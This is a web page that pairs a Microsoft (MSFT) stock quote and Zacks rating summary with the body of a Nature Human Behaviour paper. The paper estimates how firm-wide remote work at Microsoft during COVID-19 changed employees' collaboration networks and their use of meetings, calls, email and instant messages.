
Microsoft (MSFT)

(delayed data from nsdq).

$402.18 USD

-0.61 (-0.15%)

Updated Feb 21, 2024 04:00 PM ET

After-Market: $403.17 +0.99 (0.25%) 6:18 PM ET


This is our short term rating system that serves as a timeliness indicator for stocks over the next 1 to 3 months. How good is it? See rankings and related performance below.


Zacks Rank: 2-Buy of 5

The Style Scores are a complementary set of indicators to use alongside the Zacks Rank. It allows the user to better focus on the stocks that are the best fit for his or her personal trading style.

The scores are based on the trading styles of Value, Growth, and Momentum. There's also a VGM Score ('V' for Value, 'G' for Growth and 'M' for Momentum), which combines the weighted average of the individual style scores into one score.

Within each Score, stocks are graded into five groups: A, B, C, D and F. As you might remember from your school days, an A, is better than a B; a B is better than a C; a C is better than a D; and a D is better than an F.

As an investor, you want to buy stocks with the highest probability of success. That means you want to buy stocks with a Zacks Rank #1 or #2, Strong Buy or Buy, which also has a Score of an A or a B in your personal trading style.


D  Value | D  Growth | B  Momentum | D  VGM

The Zacks Industry Rank assigns a rating to each of the 265 X (Expanded) Industries based on their average Zacks Rank.

An industry with a larger percentage of Zacks Rank #1's and #2's will have a better average Zacks Rank than one with a larger percentage of Zacks Rank #4's and #5's.

The industry with the best average Zacks Rank would be considered the top industry (1 out of 265), which would place it in the top 1% of Zacks Ranked Industries. The industry with the worst average Zacks Rank (265 out of 265) would place in the bottom 1%.


Top 25% (63 out of 250)

Industry: Computer - Software


Company Summary


Microsoft Corporation is one of the largest broad-based technology providers in the world. The company dominates the PC software market with more than 73% of the market share for desktop operating systems. The company’s Microsoft 365 application suite is one of the most popular productivity software suites globally. It is also one of the prominent public cloud providers that can deliver a wide variety of infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) solutions at scale. Redmond, WA-based Microsoft’s products include operating systems, cross-device productivity applications, server applications, business solution applications, desktop and server management tools, software development tools and video games. Its software solutions and hardware devices are playing an important role in developing the metaverse. The company designs and sells PCs, tablets, gaming and entertainment consoles, other intelligent devices, and related accessories. Through Azure, it offers cloud-based solutions that provide customers with software, services, platforms and content. Microsoft reported revenues of $211.9 billion in fiscal 2023. The company reports operations under three segments: Productivity & Business Processes, Intelligent Cloud and More Personal Computing. Productivity & Business Processes accounted for 32.6% of fiscal 2023 revenues. The segment offers productivity and collaboration tools and services including Office 365, Dynamics business solutions, Teams, Relationship Sales solution, Power Platform and LinkedIn. Intelligent Cloud, which includes Azure cloud services, contributed 41.4% of fiscal 2023 revenues. In Jan, 2022, the company entered into a definitive agreement to acquire Activision Blizzard. The acquisition will accelerate the growth in Microsoft’s gaming business across mobile, PC, console, and cloud gaming. Microsoft and Activision Blizzard have jointly agreed to extend the merger agreement through Oct 18, 2023 to allow for additional time to resolve remaining regulatory concerns. More Personal Computing represented 25.8% of fiscal 2023 revenues. The segment comprises mainly the Windows, Gaming (Xbox hardware and Xbox software and services), Devices (Surface, PC accessories, and other intelligent devices) and Search (Bing and Microsoft Advertising) businesses.

General Information

Microsoft Corporation

ONE MICROSOFT WAY

REDMOND, WA 98052

Phone: 425-882-8080

Fax: 425-706-7329

Web: http://www.microsoft.com


  • Published: 09 September 2021

The effects of remote work on collaboration among information workers

  • Longqi Yang   ORCID: orcid.org/0000-0002-6615-8615 1 ,
  • David Holtz   ORCID: orcid.org/0000-0002-0896-8628 2 , 3 ,
  • Sonia Jaffe   ORCID: orcid.org/0000-0001-8924-0294 1 ,
  • Siddharth Suri   ORCID: orcid.org/0000-0002-1318-8140 1 ,
  • Shilpi Sinha 1 ,
  • Jeffrey Weston 1 ,
  • Connor Joyce 1 ,
  • Neha Shah 1 ,
  • Kevin Sherman   ORCID: orcid.org/0000-0001-5793-3336 1 ,
  • Brent Hecht   ORCID: orcid.org/0000-0002-7955-0202 1 &
  • Jaime Teevan   ORCID: orcid.org/0000-0002-2786-0209 1  

Nature Human Behaviour volume 6, pages 43–54 (2022)


An Author Correction to this article was published on 05 October 2021

This article has been updated

The coronavirus disease 2019 (COVID-19) pandemic caused a rapid shift to full-time remote work for many information workers. Viewing this shift as a natural experiment in which some workers were already working remotely before the pandemic enables us to separate the effects of firm-wide remote work from other pandemic-related confounding factors. Here, we use rich data on the emails, calendars, instant messages, video/audio calls and workweek hours of 61,182 US Microsoft employees over the first six months of 2020 to estimate the causal effects of firm-wide remote work on collaboration and communication. Our results show that firm-wide remote work caused the collaboration network of workers to become more static and siloed, with fewer bridges between disparate parts. Furthermore, there was a decrease in synchronous communication and an increase in asynchronous communication. Together, these effects may make it harder for employees to acquire and share new information across the network.


Before the COVID-19 pandemic, at most 5% of Americans worked from home for more than three days per week 1 , whereas it is estimated that, by April 2020, as many as 37% of Americans were working from home (WFH) full-time 2 , 3 . Thus, in a matter of weeks, the pandemic caused about one-third of US workers to shift to WFH and nearly every American that was able to work from home did so 4 . Many technology companies, such as Twitter, Facebook, Square, Box, Slack and Quora, have taken this shift one step further by announcing longer term and, in some cases permanent, remote work policies that will enable at least some employees to work remotely, even after the pandemic 5 , 6 . More generally, COVID-19 has accelerated the shift away from traditional office work, such that even firms that do not keep full-time remote work policies in place after the pandemic has ended are unlikely to fully return to their pre-COVID-19 work arrangements 7 . Instead, they are likely to switch to some type of hybrid work model, in which employees split their time between remote and office work, or a mixed-mode model, in which firms are comprised of a mixture of full-time remote employees and full-time office employees. For example, some scholars predict a long-run equilibrium in which information workers will work from home approximately 20% of the time 1 . For long-term policy decisions regarding remote, hybrid and mixed-mode work to be well informed, decision makers need to understand how remote work would impact information work in the absence of the effects of COVID-19. To answer this question, we treat Microsoft’s company-wide WFH policy during the pandemic as a natural experiment that, subject to the validity of our identifying assumptions, enables us to causally identify the impact of firm-wide remote work on employees’ collaboration networks and communication practices.

Previous research has shown that network topology, including the strength of ties, has an important role in the success of both individuals and organizations. For individuals, it is beneficial to have access to new, non-redundant information through connections to different parts of an organization’s formal organizational chart and through connections to different parts of an organization’s informal communication network 8 . Furthermore, being a conduit through which such information flows by bridging ‘structural holes’ 9 in the organization can have additional benefits for individuals 10 . For firms, certain network configurations are associated with the production of high-quality creative output 11 , and there is a competitive advantage to successfully engaging in the practice of ‘knowledge transfer,’ in which experiences from one set of people within an organization are transferred to and used by another set of people within that same organization 12 . Conditional on a given network position or configuration, the efficacy with which a given tie can transfer or provide access to novel information depends on its strength. Two people connected by a strong tie can often transfer information more easily (as they are more likely to share a common perspective), to trust one another, to cooperate with one another, and to expend effort to ensure that recently transferred knowledge is well understood and can be utilized 10 , 13 , 14 , 15 . By contrast, weak ties require less time and energy to maintain 8 , 16 and are more likely to provide access to new, non-redundant information 8 , 17 , 18 .

Our results show that the shift to firm-wide remote work caused business groups within Microsoft to become less interconnected. It also reduced the number of ties bridging structural holes in the company’s informal collaboration network, and caused individuals to spend less time collaborating with the bridging ties that remained. Furthermore, the shift to firm-wide remote work caused employees to spend a greater share of their collaboration time with their stronger ties, which are better suited to information transfer, and a smaller share of their time with weak ties, which are more likely to provide access to new information.

Previous research has also shown that the performance of workers is affected not only by the structure of the network and the strength of their ties, but also by the temporal dynamics of the network. Not only do the benefits of different types of ties vary with their age 19 , but people also benefit from changing their network position 20 , 21 , 22 , adding new ties 23 , 24 and reconnecting with dormant ties 25 . We find that the shift to firm-wide remote work may have reduced these benefits by making the collaboration network of workers more static—individuals added and deleted fewer ties from month-to-month and spent less time with newly added ties.

Existing theoretical perspectives and empirical results suggest that knowledge transfer and collaboration are also affected by the modes of communication that workers use to collaborate with one another. On the theoretical front, media richness theory 26 , 27 posits that richer communication channels, such as in-person interaction, are best suited to communicating complex information and ideas. Moreover, media synchronicity theory 28 proposes that asynchronous communication channels (such as email) are better suited for conveying information and synchronous channels (such as video calls) are better suited for converging on the meaning of information. There is also a rich body of empirical research that documents the myriad implications of communication media choice for organizations. For example, previous research has shown that establishing a rapport, which is an important precursor to knowledge transfer, is impeded by email use 29 , and that in-person and phone/video communication are more strongly associated with positive team performance than email and instant message (IM) communication 30 .

Remote work obviously eliminates in-person communication; however, we found that people did not simply replace in-person interactions with video and/or voice calls. In fact, we found that shifting to firm-wide remote work caused an overall decrease in observed synchronous communication such as scheduled meetings and audio/video calls. By contrast, we found that remote work caused employees to communicate more through media that are more asynchronous—sending more emails and many more IMs. Media richness theory, media synchronicity theory and previous empirical studies all suggest that these communication media choices may make it more difficult for workers to convey and/or converge on the meaning of complex information.

There is a large body of academic research across multiple disciplines that has studied remote work, virtual teams and telecommuting (see ref. 31 for a review of much of this work), including previous research studies that examined the network structure of virtual teams and how individual network position in virtual teams correlates with performance 32 , 33 , 34 . During the COVID-19 pandemic, there has been renewed public and academic interest in how virtual teams function. Recent analyses of telemetry and survey data show that the pandemic has affected both the who and the how of collaboration in information firms—while working remotely during the pandemic, workers are spending less time in meetings 35 , communicating more by email 35 , collaborating more with their strong ties as opposed to their weak ties 36 , and exhibiting patterns of communication that are more siloed and less stable 37 . However, these analyses, like much of the previous research on remote work, virtual teams and telecommuting, are non-causal 31 and are therefore unable to separate the effects of remote work from the effects of pandemic-related confounding factors, such as reduced focus due to COVID-19-related stress or increased caregiving responsibilities while sheltering in place. Although previous research on the causal effects of remote work does exist, this work has mainly studied employees who volunteer to work remotely, and has focused on settings such as call centres and patent offices 38 , 39 where, relative to the majority of information work, tasks are more easily codifiable and are less likely to depend on collaboration or the transfer of complex knowledge.

In this article, we contribute to the research literatures on remote work, virtual teams and telecommuting by analysing the large-scale natural experiment created by Microsoft’s firm-wide WFH policy during the COVID-19 pandemic. As remote work was mandatory during the pandemic, we are able to quantify the effects of firm-wide remote work, which are most relevant for firms considering a transition to an all-remote workforce. Furthermore, as our model specification decomposes the overall effects of firm-wide remote work into ego remote work and collaborator remote work effects, our results also provide some insight into the possible impacts of remote work policies such as mixed-mode work and hybrid work.

We analysed anonymized individual-level data describing the communication practices of 61,182 US Microsoft employees from December 2019 to June 2020—data from before and after Microsoft’s shift to firm-wide remote work (our data on workers’ choice of communication media goes back only to February 2020). Our sample contains all US Microsoft employees except for those who hold senior leadership positions and/or are members of teams that routinely handle particularly sensitive data. Given the scope of our dataset, the workers in our sample perform a wide variety of tasks, including software and hardware development, marketing and business operations. For each employee, we observe (1) their remote work status before the COVID-19 pandemic, and what share of their colleagues were remote workers before the COVID-19 pandemic; (2) their managerial status, the business group they belong to, their role and the length of their tenure at Microsoft as of February 2020; (3) a weekly summary of the amount of time spent in scheduled meetings, time spent in unscheduled video/audio calls, emails sent and IMs sent, and the length of their workweek; and (4) a monthly summary of their collaboration network. Before the COVID-19 pandemic, managers at Microsoft used their own discretion in deciding whether an employee could work from home, which was the exception rather than the norm.

The natural experiment that we analysed came from the company-wide WFH mandate Microsoft enacted in response to COVID-19. On 4 March 2020, Microsoft mandated that all non-essential employees in their Puget Sound and Bay Area campuses shift to full-time WFH. Other locations followed suit and, by 1 April 2020, all non-essential US Microsoft employees were WFH full-time. Before the onset of the pandemic, 18% of US Microsoft employees were working remote from their collaborators. For this subset of employees, the shift to firm-wide remote work did not cause a change in their own remote work status, but did induce variation in the share of their colleagues who were working remotely. For the remaining 82% of US Microsoft employees, the shift to firm-wide remote work induced variation in both their own remote work status and in the remote work status of their coworkers.

We analysed this natural experiment using a modified difference-in-differences (DiD) model. Standard DiD is an econometric approach that enables researchers to infer the causal effect of a treatment by comparing longitudinal data from at least two groups, some of which are ‘treated’ and some of which are not. Provided that the identifying assumptions of the DiD model are satisfied, the causal effect of the treatment is obtained by comparing the magnitude of the gap between the treated and untreated groups after the treatment is delivered with the magnitude of the gap between the groups before the treatment is delivered. Our modified DiD model extends the standard DiD model by estimating the causal effects of changes in two different treatment variables (one’s own remote work status and the remote work status of one’s colleagues) and by introducing additional identifying assumptions such that it is possible to draw causal inferences in the presence of an additional shock (in our case, the non-WFH-related aspects of COVID-19) that affects both treated and untreated units, and is concurrent with the exogenous shock(s) to our treatment variables. The time series trends shown in Fig. 1 suggest that the identifying assumptions of our modified DiD model are plausible; further details on the model are provided in the Methods .

Fig. 1: a–d, The average number of bridging ties per month (a, c) and the average unscheduled video/audio call hours per week (b, d) for different groups of employees, relative to the overall average in February. These plots establish the plausibility of the ‘parallel trends’ assumption that is required by our modified DiD model. The error bars show the 95% CIs and are in some places thinner than the symbols in the figure; s.e. values are clustered at the team level. a, b, The graphs show employees who, before COVID-19, worked from the office (blue; n = 50,268) and a matched sample of employees who worked remotely (orange; n = 10,914). c, d, The graphs show two subgroups of the blue lines in a and b—employees who, before COVID-19, had less than 10% of their collaborators working remotely (dashed; n = 36,008) and those who had more than 50% of their coworkers working remotely (dotted; n = 1,861). Both variables were normalized by subtracting and dividing by the average across the entire sample of that variable in February. Most employees transitioned to WFH during the week of 1 March 2020, although our analysis omits the month of March as a transition period.

In all of the analyses that follow, we cannot report the actual level of our outcome variables due to confidentiality concerns. Instead, throughout the paper we report outcomes and effects in terms of February value (FV)—the average level of that variable (for example, number of bridging ties) for all US employees in February.

Effects of remote work on collaboration networks

We start by presenting the non-causal time-series trends for different collaboration network outcomes across our entire sample. These trends provide insights into how work practices have changed during the COVID-19 pandemic, and also represent the type of data that many executives may use when making decisions regarding their firm’s long-term remote work policy.

Descriptive statistics

Figure 2 shows the average monthly time series for various aspects of workers’ collaboration egocentric (ego) networks from December 2019 to June 2020: the number of connections, the number of groups interacted with, the number of and share of time with cross-group connections, the number and share of time with bridging connections, the clustering coefficient, the share of time with weak connections, the number of churned and added connections, and the share of time with added connections. Mathematical definitions for these measures are provided in the Methods . Although we did not find evidence of a clear pattern of change around the shift to firm-wide remote work for many of these measures, we did observe large changes in the average shares of monthly collaboration hours spent with cross-group ties, bridging ties, weak ties and added ties, which all decreased precipitously between February and June.

Fig. 2: a–k, The monthly averages for the collaboration network variables for all employees relative to the February average. Each variable was normalized by subtracting and dividing by the average FV for that variable. The vertical bars show the 95% CIs, but are in most places not much taller than the data points; s.e. values are clustered at the team level. The variables are employees’ average number of network ties (a), distinct business groups in which they have a collaborator (b), cross-group ties (c), ties that bridge structural holes in the network (e), individual clustering coefficient (g), collaborators from the previous month that they did not collaborate with that month (i) and added collaborators they did not collaborate with the previous month (j), as well as the share of time spent with cross-group ties (d), bridging ties (f), weak ties (h) and added ties (k). n = 61,279 for each panel.

Causal analysis

We next used our modified DiD model to isolate the effects of firm-wide remote work on the collaboration network, which are shown in Fig. 3 . Although we found no effect on the number of collaborators that employees had (the size of their collaboration ego network), we did find that firm-wide remote work decreased the number of distinct business groups that an employee was connected to by 0.07 FV ( P  < 0.001, 95% confidence interval (CI) = 0.05–0.10). Firm-wide remote work also decreased the cross-group connections of workers by 0.04 FV ( P  = 0.008, 95% CI = 0.01–0.07) and the share of collaboration time workers spent with cross-group connections by 0.26 FV ( P  < 0.001, 95% CI = 0.23–0.29). In other words, firm-wide remote work caused an overall decrease in the number of cross-group interactions and the fraction of attention paid to groups other than one’s own.

Fig. 3: The estimated causal effects of both an employee and that employee’s colleagues switching to remote work on the number of collaborators an employee has, the number of distinct groups the employee collaborates with, the number of cross-group ties an employee has, the share of time an employee spends collaborating with cross-group ties, the number of bridging ties an employee has, the share of time an employee spends collaborating with bridging ties, the individual clustering coefficient of an employee’s ego network, the share of time an employee spent collaborating with weak ties, the number of churned collaborators, the number of added collaborators and the share of time spent with added collaborators. The reported effects are (β + δ) from equation (1), normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n = 61,182 for all variables. The full results are provided in Supplementary Tables 1 and 2.

Although formal organizational boundaries shape informal interactions 40 , the formal organization of firms and their informal social structure are two distinct, interrelated concepts 41 . Connections that provide access to diverse teams may not bridge structural holes in the network sense 9 , and connections that bridge structural holes in the network sense may not provide access to different parts of the formal organizational chart. We therefore also analysed how the shift to firm-wide remote work affected the structural diversity of employees’ ego networks with respect to the firm’s observed communication network, as opposed to the formal organizational chart. We label each tie as ‘bridging’ or ‘non-bridging’ on the basis of its local network constraint, which is a measure of the extent to which a given tie bridges structural holes in a network 9 , 42 . We then measured the effect of firm-wide remote work on the number of bridging ties that each worker had and the amount of time that each worker spent with their bridging ties. We found that, on average, firm-wide remote work decreased the number of bridging ties by 0.09 FV ( P  < 0.001, 95% CI = 0.06–0.13) and the share of time with bridging ties by 0.41 FV ( P  < 0.001, 95% CI = 0.35–0.47). The fact that firm-wide remote work caused workers to have fewer bridging ties, and to spend less time with their remaining bridging ties, suggests that firm-wide remote work may have reduced the ability of workers to access new information in other parts of the network. These results, in conjunction with our finding that firm-wide remote work reduced workers’ cross-group interactions, also suggest that firm-wide remote work caused the collaboration network to become more siloed, both in a formal sense and in an informal sense.

We also found that firm-wide remote work caused a 0.06 FV ( P  = 0.005, 95% CI = 0.02–0.10) increase in the individual clustering coefficient, which provides a measure of what proportion of an individual’s network connections are also connected to each other (the higher a person’s individual clustering coefficient, the more dense their ego network). Given the fact that we did not observe a statistically significant effect of remote work on the number of colleagues with whom workers collaborate, this result suggests that, on average, firm-wide remote work caused workers to substitute ties that were not connected to one another for those that were. In other words, different portions of the network, which became less interconnected, also became more intraconnected.

The ability of a worker to effectively access knowledge from other parts of an organization is a function of not only the organizational and/or topological diversity of their connections, but also the strength of those connections. For each month, we classified ties as strong when they were in the top 50% of an employee’s ties in terms of hours spent communicating, and as weak otherwise. Although we have not seen strong and weak ties defined in this exact way elsewhere in the research literature on social networks, the research community has not, to our knowledge, converged on a standard way to measure tie strength. Our operationalization is similar to a common tie strength definition that simply counts the amount of contact between ties 43 , 44 , 45 and allows tie strength to vary over time on the basis of the relative amount of contact between two people 46 . Also, it is consistent with Granovetter’s original notion that tie strength is determined by a combination of “the amount of time, the emotional intensity, the intimacy (mutual confiding) and the reciprocal services which characterize the tie” 8 .

Although weak ties by definition will always get less of an employee’s time than strong ties in a given month, we found that the shift to remote work reduced the share of time that workers spent collaborating with weak ties by 0.32 FV ( P  < 0.001, 95% CI = 0.29–0.35). As the median is just one possible cut-off to distinguish between strong and weak ties, we also analysed the entire distribution of collaboration time for each worker and confirmed that the average ego-level-normalized Herfindahl–Hirschman index (HHI) 47 of the collaboration time is increased by remote work, and that the average ego-level Shannon entropy 48 of collaboration time is decreased by remote work. The effects of firm-wide remote work on both of these outcomes are provided in Supplementary Table 2 . In total, these results indicate that, above and beyond the impact of firm-wide remote work on the organizational and structural diversity of workers’ ego networks, the shift to firm-wide remote work also made the allocation of workers’ time more heavily concentrated.

We also found that the shift to firm-wide remote work caused workers’ ego networks to become more static; firm-wide remote work reduced the number of existing connections that churned from month-to-month by 0.05 FV ( P  = 0.006, 95% CI = 0.02–0.09), and decreased the number of connections workers added month-to-month by 0.04 FV ( P  = 0.015, 95% CI = 0.01–0.07). Furthermore, the shift to firm-wide remote work decreased the share of time that workers spent collaborating with the connections they did add by 0.29 FV ( P  < 0.001, 95% CI = 0.24–0.34). Of the added ties we observed in June 2020, 40% existed in at least one month between January 2020 and May 2020, whereas the remaining 60% did not. This suggests that the added ties that we observed are a mixture of dormant ties 25 and ties that are truly new. Overall, the changes that we observed in the temporal dynamics of ego networks may have made it more difficult for workers to capture the benefits associated with forming new connections 23 , 24 , reconnecting with dormant connections 25 and modulating their network position 20 , 21 , 22 . These results are robust to the use of alternative definitions of added and deleted ties (full details are provided in the Supplementary Information ).

In summary, our results suggest that firm-wide remote work ossified workers’ ego networks, made the network more fragmented and made each fragment more clustered. We tested for heterogeneity in the effects of the shift to firm-wide remote work on collaboration ego networks with respect to a worker’s managerial status (manager versus individual contributor), tenure at Microsoft (shorter tenure versus longer tenure) and role type (engineering versus non-engineering), and did not find meaningful heterogeneity across any of these dimensions (Supplementary Figs. 1 , 2 and 4 ).

The effects of remote work on the use of communication media

In addition to estimating the effects of firm-wide remote work on workers’ collaboration networks, we also estimated the impact of firm-wide remote work on workers’ choice of communication media.

Figure 4 shows the non-causal time-series trends for workweek hours and different communication media outcomes across our entire sample. Detailed definitions for each of these outcomes are provided in the Methods . For unscheduled call hours, meeting hours, total video/audio hours and IMs sent, we observed considerable increases around the time of the switch to firm-wide remote work; these increases are sustained through our data timespan. The change in email volume is much smaller and shorter-lived. Figure 4f shows the change in workweek hours, a metric that measures the total amount of time between the first observed work activity and the last observed work activity on each work day in a given week. Although there was a sustained increase in workweek hours, it was too small to account for the large increases that we observed in the use of various communication media without a simultaneous shift in the way that employees were conducting work.

Fig. 4

a – f , The weekly averages for each variable, relative to the February average. Each variable was normalized by subtracting and dividing by the average FV for that variable. The vertical bars show the 95% CIs, but are in most places not much taller than the data points; s.e. values are clustered at the team level. The variables are the employees’ average number of unscheduled audio/video call hours ( a ), scheduled meeting hours ( b ), total hours in scheduled meetings and unscheduled calls (the sum of a and b ) ( c ), IMs sent ( d ), emails sent ( e ), and hours between the first and last activity (sent email, scheduled meeting, or Microsoft Teams call or chat) in a day, summed across the workdays ( f ). The dips in all six metrics during the weeks of 16 February, 24 May and 14 June were due to four-day workweeks, in observance of Presidents’ Day, Juneteenth and Memorial Day, respectively. n  = 61,279 for all variables.

Figure 5 shows the estimated causal effects of firm-wide remote work on the amount of communication conducted through different media, as well as the length of workers’ workweeks. Relative to the baseline case of all coworkers working in an office together, we found that firm-wide remote work decreased scheduled meeting hours by 0.16 FV ( P  < 0.001, 95% CI = 0.13–0.19) and increased unscheduled video/audio call hours by 1.6 FV ( P  < 0.001, 95% CI = 1.5–1.8). The increase in unscheduled calls was more than offset by the decrease in scheduled meeting hours. To observe that, we defined the sum of unscheduled call hours and scheduled meetings hours as the synchronous video/audio communication hours. We estimate that firm-wide remote work caused a slight decrease of 0.05 FV ( P  = 0.006, 95% CI = 0.01–0.08) in the total amount of synchronous video/audio communication. Given that, by definition, a shift to firm-wide remote work causes in-person interactions to drop to zero and synchronous video/audio communication decreased overall, our results also indicate that firm-wide remote work led to a decrease in the total amount of synchronous collaboration, both in-person and through Microsoft Teams.

Fig. 5

The estimated causal effects of both an employee and their colleagues switching to remote work on the employee’s hours spent in scheduled meetings, hours spent in unscheduled calls, the sum of meetings and call hours, IMs sent, emails sent and estimated workweek hours. The reported effects are ( β  +  δ ) from equation ( 1 ), normalized by dividing by the average level of that variable in February. The symbols depict point estimates and lines depict 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Table 3 .

Although firm-wide remote work caused a decrease in synchronous communication, it also caused an increase in the amount of asynchronous communication. Firm-wide remote work increased the number of emails sent by workers by 0.08 FV ( P  < 0.001, 95% CI = 0.05–0.12) and the number of IMs sent by workers by 0.50 FV ( P  < 0.001, 95% CI = 0.46–0.55). Firm-wide remote work also increased the average number of workweek hours by 0.10 FV ( P  < 0.001, 95% CI = 0.09–0.11); however, this effect is small relative to the effect on IM volume. This suggests that the increase in IMs reflects a change in workers’ collaboration patterns while working, as opposed to changes in how much workers were working. The fact that shifting to firm-wide remote work increased the number of workweek hours also makes the negative effect of firm-wide remote work on synchronous collaboration more notable. The increase in workweek hours could be an indication that employees were less productive and required more time to complete their work, or that they replaced some of their commuting time with work time; however, as we are able to measure only the time between the first and last work activity in a day, it could also be that the same amount of working time is spread across a greater share of the calendar day due to breaks or interruptions for non-work activities.

Heterogeneous effects of firm-wide remote work on communication media choice

Although the effects of firm-wide remote work on collaboration networks did not exhibit heterogeneity across the worker attributes that we observed, the effects of firm-wide remote work on communication media were in some cases larger for managers and engineers. We found that the switch to firm-wide remote work caused larger increases for managers than individual contributors in IMs sent, emails sent and unscheduled video/audio call hours (Fig. 6 , left). This is probably because, relative to individual contributors, a larger share of managers’ time is dedicated to communicating with others, that is, their direct reports (for example, to address issues blocking progress or conduct performance reviews), and representatives of other groups within the organization (for example, to coordinate activity and goals across different groups). We also find that the shift to firm-wide remote work caused larger increases for engineers than non-engineers in the number of IMs sent and the number of unscheduled call hours (Fig. 6 , right). This may be reflective of the fact that software development teams are particularly reliant on informal communication 49 , 50 , 51 , much of which may have taken place in-person before the shift to firm-wide remote work. We did not find meaningful heterogeneity with respect to employee tenure at Microsoft.

Fig. 6

The causal effects, estimated separately for managers ( n  = 9,715) and individual contributors (ICs) ( n  = 51,467) (left) and engineers ( n  = 29,510) and non-engineers ( n  = 31,672) (right), of an employee and their colleagues switching to remote work on hours spent in scheduled meetings, the sum of scheduled meetings and unscheduled call hours, IMs sent, emails sent and estimated workweek hours ( a ), and hours spent in unscheduled calls ( b ). The reported effects are ( β  +  δ ) from equation ( 1 ), normalized by dividing by the average level of that variable for all employees in February. The symbols depict point estimates and the lines show the 95% CIs. The full results are provided in Supplementary Tables 8 , 9 , 22 and 23 .

Decomposing the effects of firm-wide remote work

One benefit of our empirical approach is that it enables us to decompose the causal effects of firm-wide remote work into two components: the direct effect of an employee working remotely on their own work practices (ego effects) and the indirect effect of all an employee’s colleagues working remotely on that employee’s work practices (collaborator effects). The model is linear, so the predicted effects from having half of one’s collaborators switch to remote work would be half as large.

Figure 7 shows the ego and collaborator effects of firm-wide remote work on people’s collaboration networks. Notably, the remote work status of an employee and that employee’s collaborators both contributed to the total effect of firm-wide remote work for most network outcomes. An employee’s collaborators switching to remote work seems to have had a particularly large impact on the amount of time that workers spent with ties that are most likely to provide access to new information, that is, cross-group ties, bridging ties, weak ties and added ties. As seen in Fig. 8 , collaborator effects also dominate ego effects when we decomposed the effects of firm-wide remote work on communication media usage. More than half of the increase in IMs sent and emails sent was due to collaborators switching to remote work, and approximately 90% (+0.09 FV, P  < 0.001, 95% CI = 0.07–0.10) of the increase in workweek hours was due to collaborators switching to remote work. Overall, we found that collaborators switching to remote work caused workers to spend less time attending to sources of new information, communicate more through asynchronous media and work longer hours. Looking to the future, these findings suggest that remote work policies such as mixed-mode and hybrid work may have substantial effects not only on those working remotely but also on those remaining in the office.

Fig. 7

The estimated causal effects of either an employee ( δ from equation ( 1 )) or their colleagues ( β from equation ( 1 )) switching to remote work on the number of collaborators that an employee has, the number of distinct groups the employee collaborates with, the number of cross-group ties an employee has, the share of time an employee spends collaborating with cross-group ties, the number of bridging ties an employee has, the share of time an employee spends collaborating with bridging ties, the individual clustering coefficient of an employee’s ego network, the share of time an employee spent collaborating with weak ties, the number of churned collaborators, the number of added collaborators and the share of time spent with added collaborators. All effects were normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Tables 1 and 2 .

Fig. 8

The estimated causal effects of either an employee ( δ from equation ( 1 )) or their colleagues ( β from equation ( 1 )) switching to remote work on hours spent in scheduled meetings, the sum of scheduled meetings and unscheduled call hours, IMs sent, emails sent and estimated workweek hours ( a ), and hours spent in unscheduled calls ( b ). All effects were normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Table 3 .

Our results suggest that shifting to firm-wide remote work caused the collaboration network to become more heavily siloed—with fewer ties that cut across formal business units or bridge structural holes in Microsoft’s informal collaboration network—and that those silos became more densely connected. Furthermore, the network became more static, with fewer ties added and deleted per month. Previous research suggests that these changes in collaboration patterns may impede the transfer of knowledge 10 , 12 , 13 and reduce the quality of workers’ output 11 , 23 . Our results also indicate that the shift to firm-wide remote work caused synchronous communication to decrease and asynchronous communication to increase. Not only were the communication media that workers used less synchronous, but they were also less ‘rich’ (for example, email and IM). These changes in communication media may have made it more difficult for workers to convey and process complex information 26 , 27 , 28 .

We expect that the effects we observe on workers’ collaboration and communication patterns will impact productivity and, in the long-term, innovation. Yet, across many sectors, firms are making decisions to adopt permanent remote work policies based only on short-term data 52 . Importantly, the causal estimates that we report are substantially different compared with the effects suggested by the observational trends shown in Figs. 2 and 4 . Thus, firms making decisions on the basis of non-causal analyses may set suboptimal policies. For example, some firms that choose a permanent remote work policy may put themselves at a disadvantage by making it more difficult for workers to collaborate and exchange information.

Beyond estimating the causal effects of firm-wide remote work, our results also provide preliminary insights into the effects of remote work policies such as mixed-mode and hybrid work. Specifically, the non-trivial collaborator effects that we estimate suggest that hybrid and mixed-mode work arrangements may not work as firms expect. The most effective implementations of hybrid and mixed-mode work might be those that deliberately attempt to minimize the impact of collaborator effects on those employees that are not working remotely; for example, firms might consider implementations of hybrid work in which certain teams come into the office on certain days, or in which most or all workers come into the office on some days and work remotely otherwise. Firms might also consider arrangements in which only certain types of workers (for example, individual contributors) are able to work remotely.

Although we believe these early insights are helpful, firms and academics will need to undertake a combination of quantitative and qualitative research once the COVID-19 pandemic has ended to better measure both the benefits and the downsides of different remote work policies. Large firms with the ability to collect rich telemetry data will be particularly well-positioned to build on the quantitative insights presented in this work by conducting large-scale internal field experiments. If published externally, these experiments could have the capacity to greatly further our collective understanding of the causal effects of both firm-wide remote work and other work arrangements such as hybrid work and mixed-mode work. Our results, which report both direct effects and indirect effects of remote work, suggest that such experimentation needs to be conducted carefully. Simply comparing the work practices and/or productivity levels of remote workers and office workers will likely yield biased estimates of the global treatment effects of different remote work policies, due to the causal effects of one’s colleagues working remotely. In conducting these experiments, it is crucial that firms use experiment designs that are optimized for capturing the overall effects of remote work policies, for example, graph cluster randomization 53 , 54 or switchback randomization 55 . Ideally, such field experiments would be complemented with high-quality qualitative research that can describe emergent processes and workers’ perceptions and, more generally, uncover insights beyond those that can be obtained through quantitative methods.

